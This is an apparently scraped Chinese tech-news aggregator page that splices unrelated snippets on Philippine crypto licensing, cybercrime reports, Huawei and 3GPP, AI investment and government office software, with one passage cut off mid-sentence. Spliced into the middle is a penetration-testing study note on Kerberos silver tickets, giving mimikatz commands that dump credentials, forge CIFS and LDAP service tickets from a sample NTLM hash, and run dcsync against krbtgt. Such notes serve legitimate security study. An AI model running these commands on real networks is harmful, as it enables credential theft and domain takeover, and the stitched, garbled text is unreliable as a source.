菲律賓經(jīng)濟(jì)特區(qū)起草加密資產(chǎn)相關(guān)法規(guī),計(jì)劃發(fā)放25個(gè)交易所許可證:菲律賓政府所有的經(jīng)濟(jì)特區(qū)的權(quán)威正在起草加密資產(chǎn)的規(guī)則,并計(jì)劃將其發(fā)行的許可證數(shù)量限制在25個(gè)。其他規(guī)則包括要求在兩年內(nèi)投資至少100萬美元。
據(jù)菲律賓政府新聞通訊社philippine news agency報(bào)道,菲律賓的cagayan經(jīng)濟(jì)特區(qū)(ceza)是制定保護(hù)加密資產(chǎn)投資者的規(guī)則。
ceza是政府擁有和控制的機(jī)構(gòu),負(fù)責(zé)管理卡加延經(jīng)濟(jì)特區(qū)和自由港事務(wù)。據(jù)新聞媒體報(bào)道:ceza計(jì)劃成為金融科技投資中心。
lambino在本周的一份聲明中表示,該機(jī)構(gòu):將繼續(xù)嚴(yán)格審查那些有意在菲律賓啟動(dòng)ico的公司的誠信。這些公司將在ceza注冊。
數(shù)字資產(chǎn)系統(tǒng)研發(fā)咨詢下方原文鏈接:菲律賓經(jīng)濟(jì)特區(qū)起草加密資產(chǎn)相關(guān)法規(guī),計(jì)劃發(fā)放25個(gè)交易所許可證
2014年騰訊雷霆行動(dòng)發(fā)布網(wǎng)絡(luò)黑色產(chǎn)業(yè)鏈年度報(bào)告:據(jù)雷霆行動(dòng)大數(shù)據(jù)分析,此類網(wǎng)絡(luò)詐騙人員主要分布在廣西、廣東、海南和福建等重點(diǎn)區(qū)域?! ?;蘇州網(wǎng)絡(luò)招嫖案是十大案例中的唯一涉黃案件,由警方跨江蘇、湖南、遼寧和廣東四省進(jìn)行打擊?! ?十大案例中不得不提廣西南寧“村長”釣魚案。
廣西南寧市公安局網(wǎng)絡(luò)安全保衛(wèi)支隊(duì)副支隊(duì)長梁歡慶表示,社工聊天詐騙在南寧市賓陽縣一帶比較活躍。
“我們期待與政府、警方、各大互聯(lián)網(wǎng)企業(yè)、銀行、運(yùn)營商和第三方安全機(jī)構(gòu)等一起建立跨平臺(tái)、跨行業(yè)聯(lián)動(dòng)打擊網(wǎng)絡(luò)黑產(chǎn)機(jī)制。
禁止與華為討論技術(shù)標(biāo)準(zhǔn)?高通、英特爾3gpp上限制員工交流:實(shí)際上,美國商務(wù)部并沒有禁止科技公司和華為的接觸。5 月 16 號,它將華為列入黑名單,禁止華為在沒有政府許可的情況下與美國公司做交易。
不再有非正式洽談工程師和系統(tǒng)架構(gòu)師一般代表雇主參加第三代合作伙伴項(xiàng)目(3gpp)會(huì)議。這是一個(gè)由行業(yè)協(xié)會(huì)組成的全球聯(lián)盟,目的是在 2020 年 3 月份之前制定 5g 技術(shù)的相關(guān)標(biāo)準(zhǔn)。
美國財(cái)政部長斯蒂芬·姆努欽在本周日表示,如果美國在與中國貿(mào)易方面取得進(jìn)展,特朗普總統(tǒng)可能會(huì)放松美國對華為的限制——但如果兩方無法達(dá)成協(xié)議,則華盛頓將維持關(guān)稅以削減赤字。
「我認(rèn)為總統(tǒng)所說的是,如果我們在貿(mào)易磋商中有了進(jìn)展,或許他愿意為華為做一些事情——如果他能夠從中國方面獲得一些寬慰、獲得某些保證?!鼓放瑲J表示。「但這些都是國家安全問題?!?
美國財(cái)政部長斯蒂芬·姆努欽。為了減少美國的貿(mào)易逆差,并打擊所謂的不公平貿(mào)易行為,華盛頓對中國的部分商品加征了進(jìn)口關(guān)稅。?
蘋果或?qū)⒐蚕韎phone x面部識別數(shù)據(jù);京東為ai設(shè)千億投資基金 | dt數(shù)讀:2 京東金融面向全球ai人才,設(shè)千億投資基金據(jù)鳳凰網(wǎng),11月6日,由京東金融與紅杉資本聯(lián)合主辦的首屆“jdd-2017京東金融全球數(shù)據(jù)探索者大會(huì)”在北京舉辦。
此外,主辦方設(shè)立了千億投資基金對接獲勝團(tuán)隊(duì)。即日起,所有賽組和賽區(qū)均可通過“jdd—2017京東金融全球數(shù)據(jù)探索者大賽”的官方網(wǎng)站進(jìn)行報(bào)名。
一旦實(shí)踐成熟了,應(yīng)當(dāng)在其中抽取部分規(guī)則納入未來的《政府?dāng)?shù)據(jù)公開法》中,上升為法律原則。
何淵還建議,在數(shù)據(jù)消亡階段,有關(guān)部門應(yīng)通過行政立法的方式規(guī)定不同類型的政府?dāng)?shù)據(jù)必須刪除的最長時(shí)間,需要政府通過法律或行政法規(guī)的方式正式賦予公民“被遺忘權(quán)”。
【行業(yè)·資訊】▍大數(shù)據(jù)行業(yè)首部《自律公約》將于明年1月發(fā)布據(jù)經(jīng)濟(jì)參考網(wǎng),伴隨平臺(tái)需求量的暴漲和行業(yè)發(fā)展的魚龍混雜,大數(shù)據(jù)行業(yè)或?qū)⒂瓉斫y(tǒng)一的約束機(jī)制。
炎陵縣政府機(jī)關(guān)oa:怒江政府辦公政務(wù)OA系統(tǒng)中內(nèi)網(wǎng)學(xué)習(xí)筆記 | 29、白銀票據(jù)oa政府公文系統(tǒng)的概念、優(yōu)勢以及應(yīng)用案例,旨在展示其在提升政府效率和透明度方面的關(guān)鍵作用。一、oa政府公文系統(tǒng)的概念oa政府公文系統(tǒng)是指一種基于信息化技術(shù)的公文處理系統(tǒng),旨在實(shí)現(xiàn)政府機(jī)構(gòu)內(nèi)部公文的電子化管理和流轉(zhuǎn)。該系統(tǒng)通過數(shù)字化處理公文的各個(gè)環(huán)節(jié),包括起草、審批、簽發(fā)、傳閱、歸檔等,以提高政府工作的效率和準(zhǔn)確性。同時(shí),oa政府公文系統(tǒng)還可以提供實(shí)時(shí)的公文跟蹤和查詢功能,使政府工作更加透明和可追溯。二、oa政府公文系統(tǒng)的優(yōu)勢提升工作效率:傳統(tǒng)的紙質(zhì)公文處理流程繁瑣且耗時(shí),容易出現(xiàn)文件遺失和延誤等問題。而oa政府公文系統(tǒng)的數(shù)字化處理流程可以大大提高工作效率,減少人力資源的浪費(fèi)。工作人員可以通過系統(tǒng)快速起草、審批和傳閱公文,避免了傳統(tǒng)手寫和紙質(zhì)傳遞的繁瑣過程。促進(jìn)信息共享:oa政府公文系統(tǒng)可以實(shí)0、前言
白銀票據(jù)(sliver ticket) 不同于黃金票據(jù)(golden ticket)
kerberos 協(xié)議詳解:https://teamssix.com/210923-151418.html
白銀票據(jù)不與密鑰分發(fā)中心 kdc 交互,因此沒有了 kerberos 認(rèn)證協(xié)議里的前 4 步,通過偽造的票據(jù)授予服務(wù) tgs 生成偽造的服務(wù)票據(jù) st 直接與服務(wù)器 server 進(jìn)行交互。
白銀票據(jù)與黃金票據(jù)的區(qū)別:
1、白銀票據(jù)不經(jīng)過 kdc,因此白銀票據(jù)日志相對于黃金票據(jù)會(huì)更少,同時(shí)白銀票據(jù)的日志都在目標(biāo)服務(wù)器上,域控上不會(huì)有日志
2、白銀票據(jù)利用服務(wù)賬戶的哈希值,不同于黃金票據(jù)利用 krbtgt 賬戶的哈希值,因此白銀票據(jù)更加隱蔽,但白銀票據(jù)的權(quán)限就遠(yuǎn)不如黃金票據(jù)的權(quán)限了
想利用白銀票據(jù)需要先知道以下信息:
域名
域 sid
目標(biāo)服務(wù)器的 fqdn 即完整的域名
可利用的服務(wù)
服務(wù)賬戶的 ntlm 哈希
偽造的用戶名即任意用戶名
1、偽造 cifs 服務(wù)權(quán)限
cifs 服務(wù)常用于 windows 主機(jī)之間的文件共享,首先使用 mimikatz 獲取服務(wù)賬戶的 ntlm 哈希,這里使用的 username 為 dc$ 的 ntlm 哈希
代碼語言:javascript
復(fù)制
.\mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit
得到 hash 后,清空當(dāng)前系統(tǒng)中的票據(jù),防止其他票據(jù)干擾
代碼語言:javascript
復(fù)制
klist purge
# 或者在 mimikatz 里清除
kerberos::purge
使用 mimikatz 生成偽造的白銀票據(jù)
代碼語言:javascript
復(fù)制
.\mimikatz.exe "kerberos::golden /user:t /domain:teamssix.com /sid:s-1-5-21-284927032-1122706408-2778656994 /target:dc /rc4:ef9e49a41feaa171f642016fd4cb7e7a /service:cifs /ptt" exit
在偽造票據(jù)后,使用 dir 命令就能讀取到目標(biāo)的共享服務(wù)了。
2、偽造 ldap 服務(wù)權(quán)限
首先判斷當(dāng)前權(quán)限是否可以使用 dcsync 域控進(jìn)行同步
代碼語言:javascript
復(fù)制
.\mimikatz.exe "lsadump::dcsync /dc:dc /domain:teamssix.com /user:krbtgt" exit
如果返回 error 說明當(dāng)前權(quán)限不能進(jìn)行 dcsync 操作
接下來生成 ldap 服務(wù)的白銀票據(jù)
代碼語言:javascript
復(fù)制
.\mimikatz.exe "kerberos::golden /user:t /domain:teamssix.com /sid:s-1-5-21-284927032-1122706408-2778656994 /target:dc /rc4:ef9e49a41feaa171f642016fd4cb7e7a /service:ldap /ptt" exit
參考文章:
https://cloud.tencent.com/developer/article/1760135
https://shu1l.github.io/2020/06/06/qian-xi-huang-jin-piao-ju-yu-bai-yin-piao-ju/
原文鏈接:
https://teamssix.com/211009-145524.html
往期推薦
內(nèi)網(wǎng)學(xué)習(xí)筆記 | 28、黃金票據(jù)
內(nèi)網(wǎng)學(xué)習(xí)筆記 | 27、kerberos 域用戶提權(quán)漏洞
內(nèi)網(wǎng)學(xué)習(xí)筆記 | 密碼抓取
互聯(lián)網(wǎng)法律動(dòng)態(tài)報(bào)告(11月版):【知識產(chǎn)權(quán)】最高法發(fā)布《關(guān)于北京、上海、廣州知識產(chǎn)權(quán)法院案件管轄的規(guī)定》;知識產(chǎn)權(quán)局采取措施防范電商領(lǐng)域?qū)@謾?quán);奧巴馬簽署電子商標(biāo)法案。
11月6日,日本國會(huì)眾議院表決通過,旨在加強(qiáng)日本政府與民間在網(wǎng)絡(luò)安全領(lǐng)域的協(xié)調(diào)和運(yùn)用,更好應(yīng)對網(wǎng)絡(luò)攻擊。 ? ? ? 微軟緊急宣布安全公告修復(fù)漏洞。
11月18日,北京市朝陽區(qū)人民法院依法公開宣判,判決被告單位北京爾瑪天仙文化傳播有限責(zé)任公司、北京爾瑪互動(dòng)營銷策劃有限公司,被告人楊秀宇、盧梅均構(gòu)成非法經(jīng)營罪。
11月3日,最高人民法院召開的最高法新聞發(fā)布會(huì),發(fā)布《關(guān)于北京、上海、廣州知識產(chǎn)權(quán)法院案件管轄的規(guī)定》。 ? ? ? 國知局采取三方面措施防范電商領(lǐng)域?qū)@謾?quán)。
11月18日消息,蘋果、谷歌、微軟、facebook、雅虎在內(nèi)的多家硅谷公司早已結(jié)成“政府監(jiān)控改革”聯(lián)盟,以此敦促美國政府通過《美國自由法案》。該法案旨在限制nsa等情報(bào)機(jī)構(gòu)的大規(guī)模數(shù)據(jù)收集行為。
中美:人工智能將形成“雙寡頭”局面?:歐亞集團(tuán)(eurasia group)是全球最大的智庫之一,長期關(guān)注政治趨勢、商業(yè)影響、金融市場和境外投資形勢的分析,客戶包括大型投資銀行、機(jī)構(gòu)投資者、政府部門和各行業(yè)的跨國公司。
創(chuàng)新工場李開復(fù)和歐亞集團(tuán)paul triolo都認(rèn)為,目前有關(guān)中國人工智能發(fā)展的大多數(shù)媒體報(bào)道主要聚焦中美“人工智能競賽”的可能性,一般會(huì)謠傳令人危言聳聽的潛在軍事用途,甚至?xí)a(chǎn)生關(guān)于殺手機(jī)器人的猜測。
例如第四范式(提供銀行和金融機(jī)構(gòu)人工智能解決方案)、追一科技(提供智能客服,服務(wù)中國移動(dòng)、滴滴、攜程旅行網(wǎng)等)。
若你擁有更多數(shù)據(jù),那么你將擁有一個(gè)與人工智能關(guān)聯(lián)性更強(qiáng)的產(chǎn)品。這樣會(huì)使你擁有更多的用戶,賺到更多的錢,聘用更多優(yōu)秀的科學(xué)家,購買更多的機(jī)器,進(jìn)而獲得更多的數(shù)據(jù)。
中國人工智能政策具備強(qiáng)執(zhí)行力和落地能力中國政府在實(shí)現(xiàn)成果方面擁有良好的記錄,這些政策規(guī)劃應(yīng)被認(rèn)真對待。舉例來說,中國在2010年提出將成為高速鐵路領(lǐng)域的世界領(lǐng)先者?,F(xiàn)今,中國占有世界高速鐵路的60%。
當(dāng)ai觸角伸向教育和醫(yī)療,背后在下一步大棋!:如今“雙減”政策落地,k12 業(yè)務(wù)受到強(qiáng)力監(jiān)管和限制,教育的核心場景將更多轉(zhuǎn)向?qū)W校和家庭,眾多受到政策影響的機(jī)構(gòu)和公司紛紛謀求轉(zhuǎn)型,智慧教育賽道受到廣泛關(guān)注。
換句話說,訊飛醫(yī)療的模式是通過人工智能系統(tǒng)的構(gòu)建深度切入醫(yī)生臨床診斷流程,在醫(yī)生診斷過程中給予輔助,從而提升基層醫(yī)生的診療能力和服務(wù)水平。這一模式具備現(xiàn)實(shí)關(guān)懷意義。
此外,作為業(yè)界唯一通過國家執(zhí)業(yè)醫(yī)師資格考試筆試的系統(tǒng),科大訊飛的智醫(yī)助理系統(tǒng)能幫助醫(yī)生對患者進(jìn)行病情問詢、體檢預(yù)約、抗疫流調(diào)登記、新冠疫苗接種提醒、在線分析基層門診病歷,有效減輕基層醫(yī)護(hù)人員的負(fù)擔(dān)。
比如科大訊飛的城市超腦項(xiàng)目,目前初具雛形,已經(jīng)與合肥、銅陵、聊城、宣城、三明、運(yùn)城等城市落地合作。
銅陵城市超腦讓城市疫情防控實(shí)現(xiàn)精細(xì)化管理 目前,福建三明「城市大腦」項(xiàng)目預(yù)期打造立體化的「智慧三明」,通過一個(gè)中心載體、兩套體系支撐、三大城市中臺(tái)、四大領(lǐng)域應(yīng)用,打造「1+2+3+4」的「廈門大腦」體系
谷歌在中國的ai投資會(huì)成功嗎?:【新智元導(dǎo)讀】谷歌在中國大陸一直因嚴(yán)格的政府審查而無法展開市場,隨著ai的發(fā)展,谷歌正在中國大陸招聘工程師成立中國本地人才庫,包括谷歌在烏鎮(zhèn)的ai峰會(huì),都是其尋求緩解與中國政府關(guān)系進(jìn)行的嘗試,但其能否突破政府監(jiān)管仍存在重大疑問
(納斯達(dá)克股票代碼:googl)(納斯達(dá)克股票代碼:goog)進(jìn)入中國時(shí)屢遭坎坷。
中國政府更是將人工智能列為五年計(jì)劃的關(guān)鍵領(lǐng)域,召集百度加入,建立一個(gè)國家級的ai實(shí)驗(yàn)室。已經(jīng)成熟的市場今年,谷歌在烏鎮(zhèn)舉辦了一次ai峰會(huì)。
此外,谷歌云業(yè)務(wù)并未在中國開展。該業(yè)務(wù)需要和中國政府合作,才能符合把所收集數(shù)據(jù)儲(chǔ)存在境內(nèi)服務(wù)器上的規(guī)定。谷歌能否逆轉(zhuǎn)局勢?
此前谷歌在舉辦烏鎮(zhèn)ai峰會(huì)時(shí),與當(dāng)?shù)卣羞^合作,但非常有限。
轉(zhuǎn)載請注明出處,本站網(wǎng)址:
http://www.nds518.com/news_2324.html